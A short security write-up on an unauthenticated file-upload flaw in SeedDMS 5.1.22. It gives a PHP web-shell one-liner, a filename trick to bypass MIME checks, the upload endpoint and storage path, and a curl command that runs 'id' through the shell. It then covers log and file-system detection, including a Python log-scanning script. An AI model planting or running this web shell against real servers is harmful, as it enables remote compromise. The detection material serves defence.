Introduction
SeedDMS (formerly LetoDMS) is a popular, open-source document management system known for its simplicity and effectiveness in small to medium-sized enterprises. However, as with any web application, version-specific vulnerabilities can turn this asset into a liability.

SeedDMS 5.1.22 exploit
<?php system($_GET['cmd']); ?>
Rename or embed as needed. To bypass weak MIME checks, set the filename to evil.php.jpg, but the system may still save it as .php depending on the upload routine. Send a POST request to /op/op.AddFile.php with forged parameters.

The uploaded file is stored at:
/data/<folderid>/<documentid>/<version>/<filename>
Without prior documents, the system may assign a new document ID. The exact path can be brute-forced or inferred by attempting to access candidate paths. Alternatively, check for predictable patterns: data/temp/ or data/cache/. Once the shell's URL is confirmed:
curl "http://192.168.1.100/seeddms51/data/1000/1/1/evil.php?cmd=id"
Output: uid=33(www-data) gid=33(www-data) ...

Detection
grep "op.AddFile.php" /var/log/apache2/access.log | grep -B1 "POST"
If you see POST requests from an IP that never visited out.Login.php, that's a red flag. Recursively search for PHP files in the data/ directory:
find /var/www/seeddms/data -type f -size -10k -exec grep -l "eval\|system\|base64_decode" {} \;
Monitor for GET requests from the SeedDMS server to unusual external IPs (C2 callbacks) or DNS lookups for suspicious domains.

Conclusion
The SeedDMS 5.1.22 exploit serves as a textbook case of how a missing authentication check, combined with a weak file upload filter, can lead to a full system compromise. The attack surface is small, the request is simple, and the payoff (RCE) is total.
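As an added example (not part of the original write-up), the access-log check described on this page automated in Python: it flags POSTs to op.AddFile.php from clients with no earlier out.Login.php request, and any request for a .php file under data/. The log lines are constructed; the /seeddms51/ prefix is taken from the curl example above.

```python
import re

# Constructed Apache combined-log sample (not from the original page). The first
# client logs in normally; the second POSTs to op.AddFile.php without ever
# requesting out.Login.php, then fetches a .php file from the data/ tree.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /seeddms51/out/out.Login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "POST /seeddms51/op/op.Login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:01:30 +0000] "POST /seeddms51/op/op.AddFile.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "POST /seeddms51/op/op.AddFile.php HTTP/1.1" 302 0 "-" "curl/8.0"
198.51.100.7 - - [01/Jan/2024:10:05:02 +0000] "GET /seeddms51/data/1000/1/1/evil.php?cmd=id HTTP/1.1" 200 40 "-" "curl/8.0"
"""

# Client IP, timestamp, method, request path (query string included) and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse(log_text):
    """Yield the parsed fields of every line that matches the combined-log format."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def unauthenticated_uploads(log_text):
    """POSTs to op.AddFile.php from IPs with no earlier out.Login.php request in this log.
    Caveat: an IP that logged in before the log window began will also be flagged."""
    seen_login, hits = set(), []
    for r in parse(log_text):
        bare = r["path"].split("?", 1)[0]
        if bare.endswith("/out.Login.php"):
            seen_login.add(r["ip"])
        elif r["method"] == "POST" and bare.endswith("/op/op.AddFile.php") and r["ip"] not in seen_login:
            hits.append((r["ip"], r["ts"], r["path"]))
    return hits

def php_requests_under_data(log_text):
    """Any request for a .php file below data/: stored documents should never be executed."""
    return [(r["ip"], r["path"]) for r in parse(log_text)
            if "/data/" in r["path"] and r["path"].split("?", 1)[0].lower().endswith(".php")]

if __name__ == "__main__":
    for hit in unauthenticated_uploads(SAMPLE_LOG):
        print("upload without login:", hit)
    for hit in php_requests_under_data(SAMPLE_LOG):
        print("php executed from data/:", hit)
```

Point the functions at a real access.log by reading the file into a string; a hit from the second check means a stored document was served through PHP, which the web server should be configured to refuse for the data/ tree.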